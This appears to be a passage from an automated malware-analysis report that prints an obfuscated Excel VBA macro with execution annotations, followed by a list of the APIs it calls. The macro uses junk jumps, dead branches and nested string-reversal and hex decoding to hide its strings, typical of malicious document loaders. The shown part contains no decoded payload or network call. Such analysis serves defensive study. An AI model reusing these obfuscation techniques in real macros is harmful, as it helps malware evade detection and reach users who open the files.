590	Goto rOhthfZroKuFKHSklG
590	QuwcwCJzfopnsPVdHUTk:
592	OcnVUIuVsESAREIiVTNg = "zVzwHKa"
593	Goto qiHVOzhjDglyv
593	fQwZDBjYsj:
595	vvKADvUxcaHwQHyLVFEs = "TcoQknFRFDxPMj"
596	Goto nyhgTTvDPs
596	QnuBgtsILOGfunQFHc:
598	Goto UqPHDOgvQENlgJL
599	If 73222302 = 73222302 + 1 Then
599	End
599	Endif
600	Dim G0diUKAK5 as String
601	If 177537247 = 177537247 + 1 Then
601	End
601	Endif
602	Dim sNgaQyFFEJtmtYlkBE as Byte
603	Goto RtNJrFefGPbDXCasSs
603	RtNJrFefGPbDXCasSs:
605	Goto rTzjfToeUjtccOBcyLa
605	VjiyCEwVldNvx:
607	MHIGLwDKbCBRHKB = "DiOCY"
608	Goto uzNYsFtfGdcDlCptStE
608	zKcqyzIhbEGntMUK:
610	mlBEHzYngPyAUxBPMvIi = "JRe"
611	Goto lmkpahoEffuln
611	AyDpipTugvzCuSw:
612	ANKtGggHQdEZDc:
614	Goto KGvPFwKUDD
614	COOeildBQJtbeybftpZm:
616	Goto nomrcUcGTSj
617	Goto LnvHkDjGZyZkewgCmx
617	uEnnaaBJQyS:
618	JYFQIMnbYRkiEay:
620	Goto VnzolfxuQALRNZq
620	mcHQQPUFyFkxw:
622	bTPbsGdPaxsVQDYdlb = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("7B485775545253"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))	StrReverse executed
623	Goto PSKjyrbILgIMblGTGt
623	oTrJjJUOhPnQhnjvLbi:
624	xGeLoElrKSHnjj:
626	Goto tQLprYexFvbV
626	rTzjfToeUjtccOBcyLa:
628	wTAeuahAHxdYZQcN = "NsSETYb"
629	Goto QakfIYrKeZNtCDBGrk
629	bHbhpeJSTRQuBImzyOSU:
631	Goto PfildCfKtpeoftEmmZ
632	Goto mBteLNjLPeaIQvwQgs
632	rpRzQCGgGRLebyTslhs:
633	AMPeABKUPtIbvOIy:
635	Goto mHvEcQACjDIQFmuvtyVd
635	MOYvcFVCIckZE:
637	Goto AMPeABKUPtIbvOIy
638	Goto AyDpipTugvzCuSw
638	tQLprYexFvbV:
640	dnVVIIktFhBgEQiQTNg = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("5B62784A6C4242"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("31"))))))))))))))))))))))	StrReverse executed
641	Goto UaKRZpPOfUYPoRwucQlc
641	VnzolfxuQALRNZq:
643	FgGRLeMjSekgrIYf = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("6A7D775D565179"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("38"))))))))))))))))))	StrReverse executed
644	Goto MOYvcFVCIckZE
644	EhLJrgArivG:
646	MHIGLwDKbCBRHKB = "DiOCY"
647	Goto occDLYATzQpBphzwSCNSPbstO
647	lmkpahoEffuln:
649	aFevVvGASCZITaVhyM = "VgDycdJQjr"
650	Goto EhLJrgArivG
650	PSKjyrbILgIMblGTGt:
652	Goto phGUNygiCfkx
653	Goto rpRzQCGgGRLebyTslhs
653	UaKRZpPOfUYPoRwucQlc:
655	Goto fJtpeypftDmmZLn
656	Goto uEnnaaBJQyS
656	occDLYATzQpBphzwSCNSPbstO:
658	ESdLLyyaivQqVuLYLJD = "SpZkqmxOPl"
659	Goto ZxeHQDJdlbGBCAFqjr
659	dEbnBjAmqPEBv:
661	Goto TuFzRAYHRYTgwL
662	Goto KiDcieqtHdfoysVmEZ
662	QNkGfQSfvKgTdAv:
664	mlBEHzYngPyAUxBPMvIi = "JRe"
665	Goto bHbhpeJSTRQuBImzyOSU
665	mBteLNjLPeaIQvwQgs:
666	PfildCfKtpeoftEmmZ:
668	Goto oTrJjJUOhPnQhnjvLbi
668	KGvPFwKUDD:
670	rQSSRVHNUmMLcRUMlO = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("6C5C5D5175"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))	StrReverse executed
671	Goto dEbnBjAmqPEBv
671	LnvHkDjGZyZkewgCmx:
673	Goto zKcqyzIhbEGntMUK
673	mHvEcQACjDIQFmuvtyVd:
675	wvLORJjxqbIKfHMa = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("7559795A5D6C7C7C4F5C"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("39"))))))))))))))))))))))	StrReverse executed
676	Goto COOeildBQJtbeybftpZm
676	KiDcieqtHdfoysVmEZ:
677	nomrcUcGTSj:
679	Goto mcHQQPUFyFkxw
679	ZxeHQDJdlbGBCAFqjr:
681	wTAeuahAHxdYZQcN = "NsSETYb"
682	Goto ZKOodaTmjGcAGCNRg
682	QakfIYrKeZNtCDBGrk:
684	ESdLLyyaivQqVuLYLJD = "SpZkqmxOPl"
685	Goto VjiyCEwVldNvx
685	uzNYsFtfGdcDlCptStE:
687	aFevVvGASCZITaVhyM = "VgDycdJQjr"
688	Goto QNkGfQSfvKgTdAv
688	ZKOodaTmjGcAGCNRg:
689	UqPHDOgvQENlgJL:
691	If 361142316 = 361142316 + 1 Then
691	End
691	Endif
692	Dim lWRxj3i92 as Double
693	If 112438250 = 112438250 + 1 Then
693	End
693	Endif
694	Dim oCBRUXPnDygOQkNSfc as Currency
695	Goto MlOsqZNiYPdnWWJJks
695	MlOsqZNiYPdnWWJJks:
697	Goto ipIPFlghfkVOVAbM
697	qEaNQvqSUBVbjZENNMRo:
699	bTPbsGdPaxsVQDYdlb = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("7B485775545253"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))	StrReverse executed
700	Goto ChutJMPHgvoYGI
700	ciepGUdeoLGklRZrzpU:
702	Goto JYFQIMnbYRkiEay
703	Goto ediSahxYYn
703	ChutJMPHgvoYGI:
705	Goto LRaOuDECHflsQ
706	Goto FKYUDQqqRa
706	ediSahxYYn:
707	TuFzRAYHRYTgwL:
709	Goto gYwaECkZtkoyihUUvEQt
709	gYwaECkZtkoyihUUvEQt:
711	dnVVIIktFhBgEQiQTNg = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("5B62784A6C4242"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("31"))))))))))))))))))))))	StrReverse executed
712	Goto sPiuigaspLvFLHTlmH
712	OiNmDeDOIbKh:
714	If 320677785 = 320677785 + 1 Then
714	End
714	Endif
715	Dim DALcqAJhbFHntNVLql as Single
716	Goto GhPuSkvkictrOwIOKW
716	GhPuSkvkictrOwIOKW:
718	rQSSRVHNUmMLcRUMlO = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("6C5C5D5175"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))	StrReverse executed
719	Goto ciepGUdeoLGklRZrzpU
719	LkqmyBPlnwGBe:
721	KembHCCBGryFVwvLBE = "UydbIRIzMQF"
722	Goto MhAukPZZYdNGNs
722	drBkkQJlGTiP:
724	KembHCCBGryFVwvLBE = "UydbIRIzMQF"
725	Goto SQwlicurOkI
725	ipIPFlghfkVOVAbM:
727	ttTdpRlQoGSGDxPNkT = "yuFQYuEcIm"
728	Goto drBkkQJlGTiP
728	dLLylMjvJrIuyYMJDVS:
730	ZBUzYqPqBvNwTDNTPcs = "OQaxsVY"
731	Goto LkqmyBPlnwGBe
731	FKYUDQqqRa:
732	fJtpeypftDmmZLn:
734	Goto OiNmDeDOIbKh
735	If 784660110 = 784660110 + 1 Then
735	End
735	Endif
736	Dim riyHpoccEMYBUAXpCp as Long
737	Goto nnKLUrZDSFYgWCvwyB
737	nnKLUrZDSFYgWCvwyB:
738	psMptHRnAnaBYVygx:
740	Goto MnKWkSjVZnkevtRmLR
741	Goto nMnysKHfAZQN
741	nMnysKHfAZQN:
742	MnKWkSjVZnkevtRmLR:
744	Goto qEaNQvqSUBVbjZENNMRo
744	KVaoJLUfZCSlFZSIox:
746	vzBtSiaKsuOrwKG = "CcdD"
747	Goto wAmfmQddswzrPfY
747	sPiuigaspLvFLHTlmH:
749	Goto gDkNeKQkshMIIGLxqxcC
749	wAmfmQddswzrPfY:
751	LcrMAJhcFHoHNVKqzA = "DbhpSg"
752	Goto psMptHRnAnaBYVygx
752	gDkNeKQkshMIIGLxqxcC:
754	LcrMAJhcFHoHNVKqzA = "DbhpSg"
755	Goto DHKCbEjSODYNE
755	SQwlicurOkI:
757	ZBUzYqPqBvNwTDNTPcs = "OQaxsVY"
758	Goto KVaoJLUfZCSlFZSIox
758	DHKCbEjSODYNE:
760	vzBtSiaKsuOrwKG = "CcdD"
761	Goto dLLylMjvJrIuyYMJDVS
761	MhAukPZZYdNGNs:
763	ttTdpRlQoGSGDxPNkT = "yuFQYuEcIm"
764	Goto gjbzcHrncw
764	gjbzcHrncw:
766	Goto nYQYCdOfild
767	If 277315324 = 277315324 + 1 Then
767	End
767	Endif
768	Dim n5mSOaCWi as Long
769	If 171784810 = 171784810 + 1 Then
769	End
769	Endif
770	Dim CosSGEwQNjGekgruKf as Integer
771	Goto IeAZebmpFabkupTiCV
771	IeAZebmpFabkupTiCV:
773	Goto bhAIyeZaYdNHOs
773	BhpqotfYfJVUlpsjIY:
775	YxMFpQauQbplUiH = "jrDgzfC"
776	Goto AilFimAKgtgStPOrZqc
776	dzMbHaLPpdbUnkGd:
778	glVdkAbbqhjbAdH = "BqKArFPyy"
779	Goto HDORhCDNQRvKeyQ
780	If 337164460 = 337164460 + 1 Then
780	End
780	Endif
781	Dim aaptvnNcVFmpKmqFPk as String
782	Goto DvmSbbafQJQuHHXadV
782	DvmSbbafQJQuHHXadV:
783	qqePrNaoVnZdDroiA:
785	uUgascyityuGYmuvEdQA = "jpIQGmh"
786	Goto UqOUQdguQRblgJZ
786	UqOUQdguQRblgJZ:
788	glVdkAbbqhjbAdH = "BqKArFPyy"
789	Goto LfZOuDECHslsQ
789	FgrlDAQtRJF:
791	Goto bmpFablupTiCWojYFN
792	Goto jxSGPniLNuOTcRxGGEJ
792	QoYiokwMcjl:
794	Goto ANKtGggHQdEZDc
795	Goto RMqsZfyGvbQQVb
795	iPtIpvOQLsnnmrcUc:
797	GVrfoLGkmSnsAqVe = "diMTyKKae"
798	Goto hSjmphFjNxtiCtkx
798	raaMNoxJmFk:
800	Goto dqePrNMoVnZdDepjB
801	Goto bnbYRkhEoyEAMdezB
801	bnbYRkhEoyEAMdezB:
803	Goto iPtIpvOQLsnnmrcUc
803	KSfHbGewVwVP:
805	FgGRLeMjSekgrIYf = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("6A7D775D565179"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("38"))))))))))))))))))	StrReverse executed
806	Goto QoYiokwMcjl
806	RMqsZfyGvbQQVb:
807	phGUNygiCfkx:
809	Goto RaqQPgVZQpSxvdRmdS
809	RaqQPgVZQpSxvdRmdS:
811	Mid (WbTn3SlMP, qGBSi0XYP, 1) = Chr(Asc(Mid(WbTn3SlMP, qGBSi0XYP, 1)) - DIzYhzYcE)	Chr Asc Mid
812	Goto raaMNoxJmFk
812	ovammBFIAZoQyBVyCQNwJj:
813	jzDFxQmeOwyS:
815	Goto KSfHbGewVwVP
815	bhAIyeZaYdNHOs:
817	lMViJeIhzKzwqIFd = "QdZlBCYaGoQ"
818	Goto dzMbHaLPpdbUnkGd
818	AilFimAKgtgStPOrZqc:
820	GVrfoLGkmSnsAqVe = "diMTyKKae"
821	Goto FgrlDAQtRJF
821	HDORhCDNQRvKeyQ:
823	If 264500552 = 264500552 + 1 Then
823	End
823	Endif
824	Dim cYjBQlZiGBegNgmujP as Double
825	Goto tJClTWqTXlyReREfCA
825	tJClTWqTXlyReREfCA:
827	uUgascyityuGYmuvEdQA = "jpIQGmh"
828	Goto BhpqotfYfJVUlpsjIY
828	hSjmphFjNxtiCtkx:
830	YxMFpQauQbplUiH = "jrDgzfC"
831	Goto qqePrNaoVnZdDroiA
831	jxSGPniLNuOTcRxGGEJ:
832	bmpFablupTiCWojYFN:
834	Goto ovammBFIAZoQyBVyCQNwJj
834	LfZOuDECHslsQ:
836	lMViJeIhzKzwqIFd = "QdZlBCYaGoQ"
837	Goto EUZbSsUzkgTpfVkuddP
837	EUZbSsUzkgTpfVkuddP:
838	nYQYCdOfild:
840	Next qGBSi0XYP	Len executed
841	Goto IdTYlyRefSsPOqlDos
841	IdTYlyRefSsPOqlDos:
843	If 113730512 = 113730512 + 1 Then
843	End
843	Endif
844	Dim gdlPqsZY3 as Integer
845	If 586070102 = 586070102 + 1 Then
845	End
845	Endif
846	Dim PmUwNtATbRvrrqygZg as Currency
847	Goto dTtuswjpvNonEtvnNp
847	dTtuswjpvNonEtvnNp:
849	Goto rIGdyQdZloDZaj
849	RQVszGlyxNQTLkzscKM:
851	neDgLvrfAqhvFoobNoKY = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("7753687A716E5263556D"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("31"))))))))))))))))))))))	StrReverse executed
852	Goto JOcZHUuuVeq
852	QaaYdOHOtFFU:
854	If 570026511 = 570026511 + 1 Then
854	End
854	Endif
855	Dim yiJfsHoGryVKHBTQmJ as Single
856	Goto igODXOFScMLaiuXqWt
856	igODXOFScMLaiuXqWt:
858	hwADvTjcLtwQtxL = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("704766484B67776A774A"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("35"))))))))))))))))	StrReverse executed
859	Goto cTsHAkRUpRVkuPdPCezy
859	FimAxgtSSuCO:
860	aQfpYYKKmuHj:
862	Goto KqOgFgrlDnJtE
862	qePrNMoVnZDepjByUrPH:
864	Goto ONeTVNnPusbO
865	Goto PgvQENlgJLsLRaOu
865	fyGwcQYVbLELqQCSVZQp:
866	JpkljoZSaDfPgkneDgL:
868	Goto xidRmdThrbaNzbxJYFQ
868	JOcZHUuuVeq:
870	Goto JpkljoZSaDfPgkneDgL
871	Goto mRqHiHSMfOlUgmitKZh
871	IaLPpPbUnk:
872	litKZhirPKn:
874	Goto dBtqBShCqzYRvxeyD
874	USYIPQnONeTQNnPvsbO:
876	Goto lxxNQTLkzscJMhJNc
877	Goto aQfpYYKKmuHjiGYkZVPifBlwCyJb
877	TlQbApmgyvSo:
879	Goto SOaesNPZjdGQpJdQMs
879	TuFzRAYHRYTgwLUeBwacIOiqfLGGFKvCJ:
881	Goto aQfpYYKKmuHj
882	Goto AzPFIAZChf
882	KHBTRoYiokwMNjluRzds:
884	Goto xyIgMqFmtL
885	Goto fyGwcQYVbLELqQCSVZQp
885	LjEdURduIeRbzuQZFa:
887	kdkOpbruxpNrVFBqK = "sFPyymzViwevhlLz"
888	Goto oRhzTnhQCLMKPA
888	MuLxBcCNHaQt:
890	UyAhnGODjffejTb = "yZYehZx"
891	Goto ogcnETpdmJEikQkqyn
891	OFTeMMzmMjwKsJvzZNKE:
893	Goto litKZhirPKn
894	Goto TqMlrnyCQmoxGBfvNiBv
894	xidRmdThrbaNzbxJYFQ:
896	MSOaesNOZidGQpJd = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("765A766F7F4A47475278"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("35"))))))))))))))))	StrReverse executed
897	Goto MnbZSliEazEBMPfAB
897	SOaesNPZjdGQpJdQMs:
899	rrSbnPjOmEeEPJcLiRdi = "qHrtC"
900	Goto BAEqjqUhhwADvTj
900	PgvQENlgJLsLRaOu:
901	xyIgMqFmtL:
903	Goto RQVszGlyxNQTLkzscKM
903	GRjxFGPojLNuATcRx:
905	Goto iGYkYVPifBlwCyJb
906	Goto trwhovLnmCsumL
906	SgHbGfwIwuoGDaJUb:
908	Goto HUuuVeqSmRqHhHSMfOlU
909	Goto izAVQhElOeKRksiNIJHM
909	rIGdyQdZloDZaj:
911	kdkOpbruxpNrVFBqK = "sFPyymzViwevhlLz"
912	Goto AfsrHKNFftmQEG
912	eFcaCkBnrQrCw:
914	pMwGMIUlmHJSqYBQx = "QfUAvvu"
915	Goto LjEdURduIeRbzuQZFa
915	mRqHiHSMfOlUgmitKZh:
916	fndIRRQUsz:
918	Goto sPKopVdvDtZ
918	sPKopVdvDtZ:
920	MSOaesNOZidGQpJd = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("765A766F7F4A47475278"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("35"))))))))))))))))	StrReverse executed
921	Goto USYIPQnONeTQNnPvsbO
921	aQfpYYKKmuHjiGYkZVPifBlwCyJb:
922	rfAqhvFoobNoKYTlQbApmgyvRo:
924	Goto xyIgMqGmtM
924	DIVhBOCoPm:
926	FDlaulbpziiUVwF = "uNsQjvjga"
927	Goto MuLxBcCNHaQt
927	KqOgFgrlDnJtE:
929	BVLCQbJJwxYhtVpTsKQ = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("717777615C59504A"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("38"))))))))))))))))))	StrReverse executed
930	Goto GRjxFGPojLNuATcRx
930	OuDECHfltQ:
932	Goto VcvDtZTUSYIPQ
933	Goto jzDFxQmeOwySAOKtHghHQdFZDc
933	UPtIcvOJyenomrcUc:
934	VcvDtZTUSYIPQ:
936	Goto TSjnphGVNygiCfkxI
936	cTsHAkRUpRVkuPdPCezy:
938	Goto fndIRRQUsz
939	Goto IaLPpPbUnk
939	rgAqhvFoobNpKY:
940	uIeRbztQZF:
942	Goto TlQbApmgyvSo
942	ogcnETpdmJEikQkqyn:
944	rrSbnPjOmEeEPJcLiRdi = "qHrtC"
945	Goto cdbgDJQvIHYceVvKCnU
945	TqMlrnyCQmoxGBfvNiBv:
946	rQrCwOLjEdUR:
948	Goto QaaYdOHOtFFU
949	If 15641000 = 15641000 + 1 Then
949	End
949	Endif
950	Dim UZLELpCCRVYQoEvgOR as Single
951	Goto MYMKEWTpZkpmwcdBKh
951	MYMKEWTpZkpmwcdBKh:
952	xyIgMqGmtM:
954	hwADvTjcLtwQtxL = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("704766484B67776A774A"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("35"))))))))))))))))	StrReverse executed
955	Goto JplljoaSaEfQgknfDgL
955	trwhovLnmCsumL:
956	lxxNQTLkzscJMhJNc:
958	Goto SQznIypDNwwjj
958	dBtqBShCqzYRvxeyD:
960	BVLCQbJJwxYhtVpTsKQ = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("717777615C59504A"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("38"))))))))))))))))))	StrReverse executed
961	Goto OuDECHfltQ
961	AfsrHKNFftmQEG:
963	pMwGMIUlmHJSqYBQx = "QfUAvvu"
964	Goto DIVhBOCoPm
964	TSjnphGVNygiCfkxI:
966	QhnsRALDv = WbTn3SlMP
967	Goto qePrNMoVnZDepjByUrPH
967	AzPFIAZChf:
968	iGYkYVPifBlwCyJb:
970	Goto BVMDQbJJxxYhtVpUsK
970	rycDoEILCcEkTPE:
972	If 178038820 = 178038820 + 1 Then
972	End
972	Endif
973	Dim wuRnMEAMcrNBKhcGIo as Byte
974	Goto OrICIbjZFABNSDyDhI
974	OrICIbjZFABNSDyDhI:
976	wMNjluRzdsZfyGvc = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("4C5C7A5A4E556B555A5F"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("39"))))))))))))))))))))))	StrReverse executed
977	Goto OFTeMMzmMjwKsJvzZNKE
977	jzDFxQmeOwySAOKtHghHQdFZDc:
978	ONeTVNnPusbO:
980	Goto TuFzRAYHRYTgwLUeBwacIOiqfLGGFKvCJ
980	cdbgDJQvIHYceVvKCnU:
982	Goto rQrCwOLjEdUR
983	Goto FimAxgtSSuCO
983	SQznIypDNwwjj:
985	neDgLvrfAqhvFoobNoKY = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("7753687A716E5263556D"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("31"))))))))))))))))))))))	StrReverse executed
986	Goto SgHbGfwIwuoGDaJUb
986	izAVQhElOeKRksiNIJHM:
987	HUuuVeqSmRqHhHSMfOlU:
989	Goto rycDoEILCcEkTPE
990	If 316277315 = 316277315 + 1 Then
990	End
990	Endif
991	Dim aLsuPrvLHpDcdENZCV as Boolean
992	Goto tKNQIgKoYUJdUKYiRR
992	tKNQIgKoYUJdUKYiRR:
993	JplljoaSaEfQgknfDgL:
995	Goto uIeRbztQZF
996	Goto rgAqhvFoobNpKY
996	BVMDQbJJxxYhtVpUsK:
998	wMNjluRzdsZfyGvc = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("4C5C7A5A4E556B555A5F"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("39"))))))))))))))))))))))	StrReverse executed
999	Goto KHBTRoYiokwMNjluRzds
999	LtwQtxLVrE:
1001	FDlaulbpziiUVwF = "uNsQjvjga"
1002	Goto eFcaCkBnrQrCw
1002	MnbZSliEazEBMPfAB:
1004	Goto rfAqhvFoobNoKYTlQbApmgyvRo
1005	Goto UPtIcvOJyenomrcUc
1005	BAEqjqUhhwADvTj:
1007	UyAhnGODjffejTb = "yZYehZx"
1008	Goto LtwQtxLVrE
1008	oRhzTnhQCLMKPA:
1010	End Function

Function SN2APmbS0, APIs: 134, Strings: 44, Number of lines: 167, Relevance: 313.417

APIs	Meta Information
Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
StrReverse
Mid
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
